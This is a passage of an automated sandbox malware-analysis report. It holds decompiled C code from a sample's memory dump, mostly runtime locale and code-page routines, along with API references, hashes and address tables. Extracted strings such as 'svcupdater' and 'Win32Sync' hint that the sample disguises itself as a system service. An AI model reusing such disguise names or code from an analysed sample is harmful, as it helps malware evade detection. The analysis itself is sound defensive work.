                                                                                      • GetUserNameA.ADVAPI32(?,000000FF), ref: 004047F7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name$ComputerFileFolderModulePathUser
                                                                                      • String ID: 549163\\user$Win32Sync$svcupdater$t
                                                                                      • API String ID: 1270763117-4290071432
                                                                                      • Opcode ID: 9a6fd8832fa8393d4c3522eb5597fe9b53c848b4998748eebcb586ab5b55a640
                                                                                      • Instruction ID: 55e26c0df20e285c69ce2c311d4454f210b9e551e63d0b969a1b0172a65cef58
                                                                                      • Opcode Fuzzy Hash: 9a6fd8832fa8393d4c3522eb5597fe9b53c848b4998748eebcb586ab5b55a640
                                                                                      • Instruction Fuzzy Hash: D642F4B19001588BDB18CB28CD947EDBB75AB82304F5482E9E249772C2D7386BC9CF5D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 87%
                                                                                      			E0042BA4D(void* __ecx, void* __edx, signed short _a4, signed short* _a8, short* _a12) {
                                                                                      				signed int _v8;
                                                                                      				int _v12;
                                                                                      				int _v16;
                                                                                      				char _v20;
                                                                                      				signed short* _v24;
                                                                                      				signed short* _v28;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				void* __ebp;
                                                                                      				signed int _t39;
                                                                                      				void* _t45;
                                                                                      				signed short* _t46;
                                                                                      				signed short _t47;
                                                                                      				signed short _t48;
                                                                                      				int _t49;
                                                                                      				void* _t53;
                                                                                      				signed short* _t57;
                                                                                      				signed short _t70;
                                                                                      				intOrPtr _t73;
                                                                                      				void* _t75;
                                                                                      				signed short _t76;
                                                                                      				intOrPtr _t83;
                                                                                      				short* _t86;
                                                                                      				signed short _t89;
                                                                                      				signed short* _t99;
                                                                                      				void* _t100;
                                                                                      				signed short _t101;
                                                                                      				signed int _t104;
                                                                                      				void* _t105;
                                                                                      
                                                                                      				_t39 =  *0x443048; // 0x9900ec21
                                                                                      				_v8 = _t39 ^ _t104;
                                                                                      				_t86 = _a12;
                                                                                      				_t101 = _a4;
                                                                                      				_v28 = _a8;
                                                                                      				_v24 = E00420590(__ecx, __edx, _t101) + 0x50;
                                                                                      				asm("stosd");
                                                                                      				asm("stosd");
                                                                                      				asm("stosd");
                                                                                      				_t45 = E00420590(__ecx, __edx, _t101);
                                                                                      				_t97 = 0;
                                                                                      				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
                                                                                      				_t89 = _t101 + 0x80;
                                                                                      				_t46 = _v24;
                                                                                      				 *_t46 = _t101;
                                                                                      				_t99 =  &(_t46[2]);
                                                                                      				 *_t99 = _t89;
                                                                                      				if(_t89 != 0 &&  *_t89 != 0) {
                                                                                      					_t83 =  *0x437c54; // 0x17
                                                                                      					E0042B9EC(_t89, 0, 0x437b40, _t83 - 1, _t99);
                                                                                      					_t46 = _v24;
                                                                                      					_t105 = _t105 + 0xc;
                                                                                      					_t97 = 0;
                                                                                      				}
                                                                                      				_v20 = _t97;
                                                                                      				_t47 =  *_t46;
                                                                                      				if(_t47 == 0 ||  *_t47 == _t97) {
                                                                                      					_t48 =  *_t99;
                                                                                      					if(_t48 == 0 ||  *_t48 == _t97) {
                                                                                      						_v20 = 0x104;
                                                                                      						_t49 = GetUserDefaultLCID();
                                                                                      						_v12 = _t49;
                                                                                      						_v16 = _t49;
                                                                                      					} else {
                                                                                      						E0042B38B(_t89, _t97,  &_v20);
                                                                                      						_pop(_t89);
                                                                                      					}
                                                                                      					goto L20;
                                                                                      				} else {
                                                                                      					_t70 =  *_t99;
                                                                                      					if(_t70 == 0 ||  *_t70 == _t97) {
                                                                                      						E0042B471(_t89, _t97,  &_v20);
                                                                                      					} else {
                                                                                      						E0042B3D6(_t89, _t97,  &_v20);
                                                                                      					}
                                                                                      					_pop(_t89);
                                                                                      					if(_v20 != 0) {
                                                                                      						_t100 = 0;
                                                                                      						goto L25;
                                                                                      					} else {
                                                                                      						_t73 =  *0x437b3c; // 0x41
                                                                                      						_t75 = E0042B9EC(_t89, _t97, "X|C", _t73 - 1, _v24);
                                                                                      						_t105 = _t105 + 0xc;
                                                                                      						if(_t75 == 0) {
                                                                                      							L20:
                                                                                      							_t100 = 0;
                                                                                      							L21:
                                                                                      							if(_v20 != 0) {
                                                                                      								L25:
                                                                                      								asm("sbb esi, esi");
                                                                                      								_t101 = E0042B878(_t89,  ~_t101 & _t101 + 0x00000100,  &_v20);
                                                                                      								if(_t101 == 0 || IsValidCodePage(_t101 & 0x0000ffff) == 0 || IsValidLocale(_v16, 1) == 0) {
                                                                                      									goto L22;
                                                                                      								} else {
                                                                                      									_t57 = _v28;
                                                                                      									if(_t57 != 0) {
                                                                                      										 *_t57 = _t101;
                                                                                      									}
                                                                                      									E0042352F(_v16,  &(_v24[0x128]), 0x55, _t100);
                                                                                      									if(_t86 == 0) {
                                                                                      										L34:
                                                                                      										_t53 = 1;
                                                                                      										L23:
                                                                                      										return E0041361E(_t53, _t86, _v8 ^ _t104, _t97, _t100, _t101);
                                                                                      									} else {
                                                                                      										_t33 =  &(_t86[0x90]); // 0xd0
                                                                                      										E0042352F(_v16, _t33, 0x55, _t100);
                                                                                      										if(GetLocaleInfoW(_v16, 0x1001, _t86, 0x40) == 0) {
                                                                                      											goto L22;
                                                                                      										}
                                                                                      										_t36 =  &(_t86[0x40]); // 0x30
                                                                                      										if(GetLocaleInfoW(_v12, 0x1002, _t36, 0x40) == 0) {
                                                                                      											goto L22;
                                                                                      										}
                                                                                      										_t38 =  &(_t86[0x80]); // 0xb0
                                                                                      										E0042FD1E(_t38, _t101, _t38, 0x10, 0xa);
                                                                                      										goto L34;
                                                                                      									}
                                                                                      								}
                                                                                      							}
                                                                                      							L22:
                                                                                      							_t53 = 0;
                                                                                      							goto L23;
                                                                                      						}
                                                                                      						_t76 =  *_t99;
                                                                                      						_t100 = 0;
                                                                                      						if(_t76 == 0 ||  *_t76 == 0) {
                                                                                      							E0042B471(_t89, _t97,  &_v20);
                                                                                      						} else {
                                                                                      							E0042B3D6(_t89, _t97,  &_v20);
                                                                                      						}
                                                                                      						_pop(_t89);
                                                                                      						goto L21;
                                                                                      					}
                                                                                      				}
                                                                                      			}

































                                                                                      0x0042ba55
                                                                                      0x0042ba5c
                                                                                      0x0042ba63
                                                                                      0x0042ba67
                                                                                      0x0042ba6b
                                                                                      0x0042ba79
                                                                                      0x0042ba7e
                                                                                      0x0042ba7f
                                                                                      0x0042ba80
                                                                                      0x0042ba81
                                                                                      0x0042ba89
                                                                                      0x0042ba8b
                                                                                      0x0042ba91
                                                                                      0x0042ba97
                                                                                      0x0042ba9a
                                                                                      0x0042ba9c
                                                                                      0x0042ba9f
                                                                                      0x0042baa3
                                                                                      0x0042baaa
                                                                                      0x0042bab7
                                                                                      0x0042babc
                                                                                      0x0042babf
                                                                                      0x0042bac2
                                                                                      0x0042bac2
                                                                                      0x0042bac4
                                                                                      0x0042bac7
                                                                                      0x0042bacb
                                                                                      0x0042bb3b
                                                                                      0x0042bb3f
                                                                                      0x0042bb52
                                                                                      0x0042bb59
                                                                                      0x0042bb5f
                                                                                      0x0042bb62
                                                                                      0x0042bb46
                                                                                      0x0042bb4a
                                                                                      0x0042bb4f
                                                                                      0x0042bb4f
                                                                                      0x00000000
                                                                                      0x0042bad2
                                                                                      0x0042bad2
                                                                                      0x0042bad6
                                                                                      0x0042baec
                                                                                      0x0042badd
                                                                                      0x0042bae1
                                                                                      0x0042bae1
                                                                                      0x0042baf5
                                                                                      0x0042baf6
                                                                                      0x0042bb7e
                                                                                      0x00000000
                                                                                      0x0042bafc
                                                                                      0x0042bafc
                                                                                      0x0042bb0b
                                                                                      0x0042bb10
                                                                                      0x0042bb15
                                                                                      0x0042bb65
                                                                                      0x0042bb65
                                                                                      0x0042bb67
                                                                                      0x0042bb6b
                                                                                      0x0042bb80
                                                                                      0x0042bb8c
                                                                                      0x0042bb96
                                                                                      0x0042bb9c
                                                                                      0x00000000
                                                                                      0x0042bbbb
                                                                                      0x0042bbbb
                                                                                      0x0042bbc0
                                                                                      0x0042bbc2
                                                                                      0x0042bbc2
                                                                                      0x0042bbd3
                                                                                      0x0042bbda
                                                                                      0x0042bc3a
                                                                                      0x0042bc3c
                                                                                      0x0042bb6f
                                                                                      0x0042bb7d
                                                                                      0x0042bbdc
                                                                                      0x0042bbdf
                                                                                      0x0042bbe9
                                                                                      0x0042bc01
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042bc09
                                                                                      0x0042bc20
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042bc2a
                                                                                      0x0042bc32
                                                                                      0x00000000
                                                                                      0x0042bc37
                                                                                      0x0042bbda
                                                                                      0x0042bb9c
                                                                                      0x0042bb6d
                                                                                      0x0042bb6d
                                                                                      0x00000000
                                                                                      0x0042bb6d
                                                                                      0x0042bb17
                                                                                      0x0042bb19
                                                                                      0x0042bb1d
                                                                                      0x0042bb33
                                                                                      0x0042bb24
                                                                                      0x0042bb28
                                                                                      0x0042bb28
                                                                                      0x0042bb38
                                                                                      0x00000000
                                                                                      0x0042bb38
                                                                                      0x0042baf6

                                                                                      APIs
                                                                                        • Part of subcall function 00420590: GetLastError.KERNEL32(?,00000008,00427C89), ref: 00420594
                                                                                        • Part of subcall function 00420590: SetLastError.KERNEL32(00000000,?,00000008,000000FF), ref: 00420636
                                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0042BB59
                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 0042BBA2
                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 0042BBB1
                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0042BBF9
                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0042BC18
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                      • String ID: X|C
                                                                                      • API String ID: 415426439-4054941898
                                                                                      • Opcode ID: 9cab679f02e88f86f742118bdc0e297988c68e7abe25fb9b670304d9ba666abc
                                                                                      • Instruction ID: 99ea592d9ec8dd99113bf41f193dc7b7e704182953ba15e308239c6b1a999779
                                                                                      • Opcode Fuzzy Hash: 9cab679f02e88f86f742118bdc0e297988c68e7abe25fb9b670304d9ba666abc
                                                                                      • Instruction Fuzzy Hash: 4E51A671B00229AFDF10DFA5EC41ABF77B8EF04700F94046AE900E7295DB78AA40C799
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 70%
                                                                                      			E0042B0E9(void* __ecx, void* __edx, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
                                                                                      				intOrPtr* _v8;
                                                                                      				short _v12;
                                                                                      				signed int _v32;
                                                                                      				intOrPtr _v40;
                                                                                      				signed int _v52;
                                                                                      				char _v272;
                                                                                      				short _v292;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				void* __ebp;
                                                                                      				void* _t33;
                                                                                      				short* _t34;
                                                                                      				intOrPtr* _t35;
                                                                                      				void* _t37;
                                                                                      				intOrPtr* _t38;
                                                                                      				signed short _t39;
                                                                                      				signed short* _t42;
                                                                                      				intOrPtr _t45;
                                                                                      				void* _t47;
                                                                                      				signed int _t50;
                                                                                      				void* _t52;
                                                                                      				signed int _t56;
                                                                                      				void* _t68;
                                                                                      				void* _t72;
                                                                                      				void* _t73;
                                                                                      				void* _t77;
                                                                                      				intOrPtr* _t84;
                                                                                      				short* _t87;
                                                                                      				void* _t89;
                                                                                      				intOrPtr* _t92;
                                                                                      				intOrPtr* _t96;
                                                                                      				short _t114;
                                                                                      				void* _t115;
                                                                                      				intOrPtr* _t117;
                                                                                      				intOrPtr _t119;
                                                                                      				signed int* _t120;
                                                                                      				void* _t121;
                                                                                      				void* _t122;
                                                                                      				intOrPtr* _t123;
                                                                                      				signed short _t125;
                                                                                      				int _t127;
                                                                                      				void* _t128;
                                                                                      				void* _t131;
                                                                                      				signed int _t132;
                                                                                      
                                                                                      				_push(__ecx);
                                                                                      				_push(__ecx);
                                                                                      				_push(_t122);
                                                                                      				_t117 = _a4;
                                                                                      				_t33 = E00420590(__ecx, __edx, _t122);
                                                                                      				_t114 = 0;
                                                                                      				_v12 = 0;
                                                                                      				_t3 = _t33 + 0x50; // 0x50
                                                                                      				_t123 = _t3;
                                                                                      				_t4 = _t123 + 0x250; // 0x2a0
                                                                                      				_t34 = _t4;
                                                                                      				 *((intOrPtr*)(_t123 + 8)) = 0;
                                                                                      				 *_t34 = 0;
                                                                                      				_t6 = _t123 + 4; // 0x54
                                                                                      				_t84 = _t6;
                                                                                      				_v8 = _t34;
                                                                                      				_t92 = _t117;
                                                                                      				_t35 = _t117 + 0x80;
                                                                                      				 *_t123 = _t117;
                                                                                      				 *_t84 = _t35;
                                                                                      				if( *_t35 != 0) {
                                                                                      					E0042B07C(0x437b40, 0x16, _t84);
                                                                                      					_t92 =  *_t123;
                                                                                      					_t131 = _t131 + 0xc;
                                                                                      					_t114 = 0;
                                                                                      				}
                                                                                      				_push(_t123);
                                                                                      				if( *_t92 == _t114) {
                                                                                      					E0042A9ED(_t84, _t92);
                                                                                      					goto L12;
                                                                                      				} else {
                                                                                      					if( *((intOrPtr*)( *_t84)) == _t114) {
                                                                                      						E0042AB0D();
                                                                                      					} else {
                                                                                      						E0042AA74(_t92);
                                                                                      					}
                                                                                      					if( *((intOrPtr*)(_t123 + 8)) == 0) {
                                                                                      						_t77 = E0042B07C("X|C", 0x40, _t123);
                                                                                      						_t131 = _t131 + 0xc;
                                                                                      						if(_t77 != 0) {
                                                                                      							_push(_t123);
                                                                                      							if( *((intOrPtr*)( *_t84)) == 0) {
                                                                                      								E0042AB0D();
                                                                                      							} else {
                                                                                      								E0042AA74(0);
                                                                                      							}
                                                                                      							L12:
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				if( *((intOrPtr*)(_t123 + 8)) == 0) {
                                                                                      					L37:
                                                                                      					_t37 = 0;
                                                                                      					goto L38;
                                                                                      				} else {
                                                                                      					_t38 = _t117 + 0x100;
                                                                                      					if( *_t117 != 0 ||  *_t38 != 0) {
                                                                                      						_t39 = E0042AF39(_t38, _t123);
                                                                                      					} else {
                                                                                      						_t39 = GetACP();
                                                                                      					}
                                                                                      					_t125 = _t39;
                                                                                      					if(_t125 == 0 || _t125 == 0xfde8 || IsValidCodePage(_t125 & 0x0000ffff) == 0) {
                                                                                      						goto L37;
                                                                                      					} else {
                                                                                      						_t42 = _a8;
                                                                                      						if(_t42 != 0) {
                                                                                      							 *_t42 = _t125;
                                                                                      						}
                                                                                      						_t119 = _a12;
                                                                                      						if(_t119 == 0) {
                                                                                      							L36:
                                                                                      							_t37 = 1;
                                                                                      							L38:
                                                                                      							return _t37;
                                                                                      						} else {
                                                                                      							_t96 = _v8;
                                                                                      							_t15 = _t119 + 0x120; // 0xd0
                                                                                      							_t87 = _t15;
                                                                                      							 *_t87 = 0;
                                                                                      							_t16 = _t96 + 2; // 0x2
                                                                                      							_t115 = _t16;
                                                                                      							do {
                                                                                      								_t45 =  *_t96;
                                                                                      								_t96 = _t96 + 2;
                                                                                      							} while (_t45 != _v12);
                                                                                      							_t18 = (_t96 - _t115 >> 1) + 1; // -1
                                                                                      							_t47 = E0042812A(_t96 - _t115 >> 1, _t87, 0x55, _v8);
                                                                                      							_t132 = _t131 + 0x10;
                                                                                      							if(_t47 != 0) {
                                                                                      								L39:
                                                                                      								_push(0);
                                                                                      								_push(0);
                                                                                      								_push(0);
                                                                                      								_push(0);
                                                                                      								_push(0);
                                                                                      								E0041807C();
                                                                                      								asm("int3");
                                                                                      								_t130 = _t132;
                                                                                      								_t50 =  *0x443048; // 0x9900ec21
                                                                                      								_v52 = _t50 ^ _t132;
                                                                                      								_push(_t87);
                                                                                      								_push(_t125);
                                                                                      								_t126 = _v40;
                                                                                      								_push(_t119);
                                                                                      								_t52 = E00420590(_t98, _t115, _v40);
                                                                                      								_t88 = _t52;
                                                                                      								_t120 =  *(E00420590(_t98, _t115, _v40) + 0x34c);
                                                                                      								_t127 = E0042B824(_t126);
                                                                                      								asm("sbb ecx, ecx");
                                                                                      								_t56 = GetLocaleInfoW(_t127, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
                                                                                      								if(_t56 != 0) {
                                                                                      									if(E00427E64(_t120, _t127,  *((intOrPtr*)(_t88 + 0x54)),  &_v272) == 0 && E0042B959(_t127) != 0) {
                                                                                      										 *_t120 =  *_t120 | 0x00000004;
                                                                                      										_t120[2] = _t127;
                                                                                      										_t120[1] = _t127;
                                                                                      									}
                                                                                      									_t62 =  !( *_t120 >> 2) & 0x00000001;
                                                                                      								} else {
                                                                                      									 *_t120 =  *_t120 & _t56;
                                                                                      									_t62 = _t56 + 1;
                                                                                      								}
                                                                                      								_pop(_t121);
                                                                                      								_pop(_t128);
                                                                                      								_pop(_t89);
                                                                                      								return E0041361E(_t62, _t89, _v32 ^ _t130, _t115, _t121, _t128);
                                                                                      							} else {
                                                                                      								if(E00423431(_t87, 0x1001, _t119, 0x40) == 0) {
                                                                                      									goto L37;
                                                                                      								} else {
                                                                                      									_t20 = _t119 + 0x80; // 0x30
                                                                                      									_t87 = _t20;
                                                                                      									_t21 = _t119 + 0x120; // 0xd0
                                                                                      									if(E00423431(_t21, 0x1002, _t87, 0x40) == 0) {
                                                                                      										goto L37;
                                                                                      									} else {
                                                                                      										_t68 = E00431247(_t87, 0x5f);
                                                                                      										_pop(_t98);
                                                                                      										if(_t68 != 0) {
                                                                                      											L31:
                                                                                      											_t22 = _t119 + 0x120; // 0xd0
                                                                                      											if(E00423431(_t22, 7, _t87, 0x40) == 0) {
                                                                                      												goto L37;
                                                                                      											} else {
                                                                                      												goto L32;
                                                                                      											}
                                                                                      										} else {
                                                                                      											_t73 = E00431247(_t87, 0x2e);
                                                                                      											_pop(_t98);
                                                                                      											if(_t73 == 0) {
                                                                                      												L32:
                                                                                      												_t119 = _t119 + 0x100;
                                                                                      												if(_t125 != 0xfde9) {
                                                                                      													E0042FD1E(_t98, _t125, _t119, 0x10, 0xa);
                                                                                      													goto L36;
                                                                                      												} else {
                                                                                      													_push(5);
                                                                                      													_t72 = E0042812A(_t98, _t119, 0x10, L"utf8");
                                                                                      													_t132 = _t132 + 0x10;
                                                                                      													if(_t72 != 0) {
                                                                                      														goto L39;
                                                                                      													} else {
                                                                                      														goto L36;
                                                                                      													}
                                                                                      												}
                                                                                      											} else {
                                                                                      												goto L31;
                                                                                      											}
                                                                                      										}
                                                                                      									}
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      			}
















































                                                                                      0x0042b0ee
                                                                                      0x0042b0ef
                                                                                      0x0042b0f1
                                                                                      0x0042b0f3
                                                                                      0x0042b0f6
                                                                                      0x0042b0fd
                                                                                      0x0042b0ff
                                                                                      0x0042b102
                                                                                      0x0042b102
                                                                                      0x0042b105
                                                                                      0x0042b105
                                                                                      0x0042b10b
                                                                                      0x0042b10e
                                                                                      0x0042b111
                                                                                      0x0042b111
                                                                                      0x0042b114
                                                                                      0x0042b117
                                                                                      0x0042b119
                                                                                      0x0042b11f
                                                                                      0x0042b121
                                                                                      0x0042b126
                                                                                      0x0042b130
                                                                                      0x0042b135
                                                                                      0x0042b137
                                                                                      0x0042b13a
                                                                                      0x0042b13a
                                                                                      0x0042b13c
                                                                                      0x0042b140
                                                                                      0x0042b189
                                                                                      0x00000000
                                                                                      0x0042b142
                                                                                      0x0042b147
                                                                                      0x0042b150
                                                                                      0x0042b149
                                                                                      0x0042b149
                                                                                      0x0042b149
                                                                                      0x0042b15b
                                                                                      0x0042b165
                                                                                      0x0042b16a
                                                                                      0x0042b16f
                                                                                      0x0042b175
                                                                                      0x0042b179
                                                                                      0x0042b182
                                                                                      0x0042b17b
                                                                                      0x0042b17b
                                                                                      0x0042b17b
                                                                                      0x0042b18e
                                                                                      0x0042b18e
                                                                                      0x0042b16f
                                                                                      0x0042b15b
                                                                                      0x0042b194
                                                                                      0x0042b2d0
                                                                                      0x0042b2d0
                                                                                      0x00000000
                                                                                      0x0042b19a
                                                                                      0x0042b19a
                                                                                      0x0042b1a3
                                                                                      0x0042b1b4
                                                                                      0x0042b1aa
                                                                                      0x0042b1aa
                                                                                      0x0042b1aa
                                                                                      0x0042b1bb
                                                                                      0x0042b1bf
                                                                                      0x00000000
                                                                                      0x0042b1e3
                                                                                      0x0042b1e3
                                                                                      0x0042b1e8
                                                                                      0x0042b1ea
                                                                                      0x0042b1ea
                                                                                      0x0042b1ec
                                                                                      0x0042b1f1
                                                                                      0x0042b2cb
                                                                                      0x0042b2cd
                                                                                      0x0042b2d2
                                                                                      0x0042b2d6
                                                                                      0x0042b1f7
                                                                                      0x0042b1f7
                                                                                      0x0042b1fa
                                                                                      0x0042b1fa
                                                                                      0x0042b202
                                                                                      0x0042b205
                                                                                      0x0042b205
                                                                                      0x0042b208
                                                                                      0x0042b208
                                                                                      0x0042b20b
                                                                                      0x0042b20e
                                                                                      0x0042b218
                                                                                      0x0042b222
                                                                                      0x0042b227
                                                                                      0x0042b22c
                                                                                      0x0042b2d7
                                                                                      0x0042b2d9
                                                                                      0x0042b2da
                                                                                      0x0042b2db
                                                                                      0x0042b2dc
                                                                                      0x0042b2dd
                                                                                      0x0042b2de
                                                                                      0x0042b2e3
                                                                                      0x0042b2e7
                                                                                      0x0042b2ef
                                                                                      0x0042b2f6
                                                                                      0x0042b2f9
                                                                                      0x0042b2fa
                                                                                      0x0042b2fb
                                                                                      0x0042b2fe
                                                                                      0x0042b2ff
                                                                                      0x0042b304
                                                                                      0x0042b30c
                                                                                      0x0042b31b
                                                                                      0x0042b327
                                                                                      0x0042b338
                                                                                      0x0042b340
                                                                                      0x0042b35a
                                                                                      0x0042b367
                                                                                      0x0042b36a
                                                                                      0x0042b36d
                                                                                      0x0042b36d
                                                                                      0x0042b377
                                                                                      0x0042b342
                                                                                      0x0042b342
                                                                                      0x0042b344
                                                                                      0x0042b344
                                                                                      0x0042b37d
                                                                                      0x0042b37e
                                                                                      0x0042b381
                                                                                      0x0042b388
                                                                                      0x0042b232
                                                                                      0x0042b242
                                                                                      0x00000000
                                                                                      0x0042b248
                                                                                      0x0042b24a
                                                                                      0x0042b24a
                                                                                      0x0042b256
                                                                                      0x0042b264
                                                                                      0x00000000
                                                                                      0x0042b266
                                                                                      0x0042b269
                                                                                      0x0042b26f
                                                                                      0x0042b272
                                                                                      0x0042b282
                                                                                      0x0042b287
                                                                                      0x0042b295
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042b274
                                                                                      0x0042b277
                                                                                      0x0042b27d
                                                                                      0x0042b280
                                                                                      0x0042b297
                                                                                      0x0042b297
                                                                                      0x0042b2a3
                                                                                      0x0042b2c3
                                                                                      0x00000000
                                                                                      0x0042b2a5
                                                                                      0x0042b2a5
                                                                                      0x0042b2af
                                                                                      0x0042b2b4
                                                                                      0x0042b2b9
                                                                                      0x00000000
                                                                                      0x0042b2bb
                                                                                      0x00000000
                                                                                      0x0042b2bb
                                                                                      0x0042b2b9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042b280
                                                                                      0x0042b272
                                                                                      0x0042b264
                                                                                      0x0042b242
                                                                                      0x0042b22c
                                                                                      0x0042b1f1
                                                                                      0x0042b1bf

                                                                                      APIs
                                                                                        • Part of subcall function 00420590: GetLastError.KERNEL32(?,00000008,00427C89), ref: 00420594
                                                                                        • Part of subcall function 00420590: SetLastError.KERNEL32(00000000,?,00000008,000000FF), ref: 00420636
                                                                                      • GetACP.KERNEL32(?,?,?,?,?,?,0041EBEC,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 0042B1AA
                                                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0041EBEC,?,?,?,00000055,?,-00000050,?,?), ref: 0042B1D5
                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0042B338
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                      • String ID: X|C$utf8
                                                                                      • API String ID: 607553120-1629001950
                                                                                      • Opcode ID: 709f726eb666b79f5bad23149724d9554512e537e0563fa609d3dd05eea2a28b
                                                                                      • Instruction ID: 6faa104a8387bd1dbd1e95285a211f66402bec9412bb850d11afb6633de07d9a
                                                                                      • Opcode Fuzzy Hash: 709f726eb666b79f5bad23149724d9554512e537e0563fa609d3dd05eea2a28b
                                                                                      • Instruction Fuzzy Hash: 3B71F731700326AAE724AB75EC56B7B73A8EF04344F94046BF905D7281EB7CA950C7A9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 96%
                                                                                      			E0042B878(void* __ecx, signed int _a4, intOrPtr _a8) {
                                                                                      				short _v8;
                                                                                      				short _t17;
                                                                                      				signed int _t18;
                                                                                      				signed int _t23;
                                                                                      				signed int _t25;
                                                                                      				signed int _t26;
                                                                                      				signed int _t27;
                                                                                      				void* _t30;
                                                                                      				void* _t31;
                                                                                      				intOrPtr _t32;
                                                                                      				intOrPtr _t33;
                                                                                      				intOrPtr* _t36;
                                                                                      				intOrPtr* _t37;
                                                                                      
                                                                                      				_t23 = _a4;
                                                                                      				if(_t23 == 0) {
                                                                                      					L21:
                                                                                      					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
                                                                                      						_t17 = _v8;
                                                                                      						if(_t17 == 0) {
                                                                                      							_t17 = GetACP();
                                                                                      						}
                                                                                      						L25:
                                                                                      						return _t17;
                                                                                      					}
                                                                                      					L22:
                                                                                      					_t17 = 0;
                                                                                      					goto L25;
                                                                                      				}
                                                                                      				_t18 = 0;
                                                                                      				if( *_t23 == 0) {
                                                                                      					goto L21;
                                                                                      				}
                                                                                      				_t36 = L"ACP";
                                                                                      				_t25 = _t23;
                                                                                      				while(1) {
                                                                                      					_t30 =  *_t25;
                                                                                      					if(_t30 !=  *_t36) {
                                                                                      						break;
                                                                                      					}
                                                                                      					if(_t30 == 0) {
                                                                                      						L7:
                                                                                      						_t26 = _t18;
                                                                                      						L9:
                                                                                      						if(_t26 == 0) {
                                                                                      							goto L21;
                                                                                      						}
                                                                                      						_t37 = L"OCP";
                                                                                      						_t27 = _t23;
                                                                                      						while(1) {
                                                                                      							_t31 =  *_t27;
                                                                                      							if(_t31 !=  *_t37) {
                                                                                      								break;
                                                                                      							}
                                                                                      							if(_t31 == 0) {
                                                                                      								L17:
                                                                                      								if(_t18 != 0) {
                                                                                      									_t17 = E0041B4E1(_t27, _t23);
                                                                                      									goto L25;
                                                                                      								}
                                                                                      								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
                                                                                      									goto L22;
                                                                                      								}
                                                                                      								_t17 = _v8;
                                                                                      								goto L25;
                                                                                      							}
                                                                                      							_t32 =  *((intOrPtr*)(_t27 + 2));
                                                                                      							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
                                                                                      								break;
                                                                                      							}
                                                                                      							_t27 = _t27 + 4;
                                                                                      							_t37 = _t37 + 4;
                                                                                      							if(_t32 != 0) {
                                                                                      								continue;
                                                                                      							}
                                                                                      							goto L17;
                                                                                      						}
                                                                                      						asm("sbb eax, eax");
                                                                                      						_t18 = _t18 | 0x00000001;
                                                                                      						goto L17;
                                                                                      					}
                                                                                      					_t33 =  *((intOrPtr*)(_t25 + 2));
                                                                                      					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
                                                                                      						break;
                                                                                      					}
                                                                                      					_t25 = _t25 + 4;
                                                                                      					_t36 = _t36 + 4;
                                                                                      					if(_t33 != 0) {
                                                                                      						continue;
                                                                                      					}
                                                                                      					goto L7;
                                                                                      				}
                                                                                      				asm("sbb edx, edx");
                                                                                      				_t26 = _t25 | 0x00000001;
                                                                                      				goto L9;
                                                                                      			}
















                                                                                      0x0042b87e
                                                                                      0x0042b885
                                                                                      0x0042b929
                                                                                      0x0042b942
                                                                                      0x0042b948
                                                                                      0x0042b94d
                                                                                      0x0042b94f
                                                                                      0x0042b94f
                                                                                      0x0042b955
                                                                                      0x0042b958
                                                                                      0x0042b958
                                                                                      0x0042b944
                                                                                      0x0042b944
                                                                                      0x00000000
                                                                                      0x0042b944
                                                                                      0x0042b88b
                                                                                      0x0042b890
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042b896
                                                                                      0x0042b89b
                                                                                      0x0042b89d
                                                                                      0x0042b89d
                                                                                      0x0042b8a3
                                                                                      0x00000000
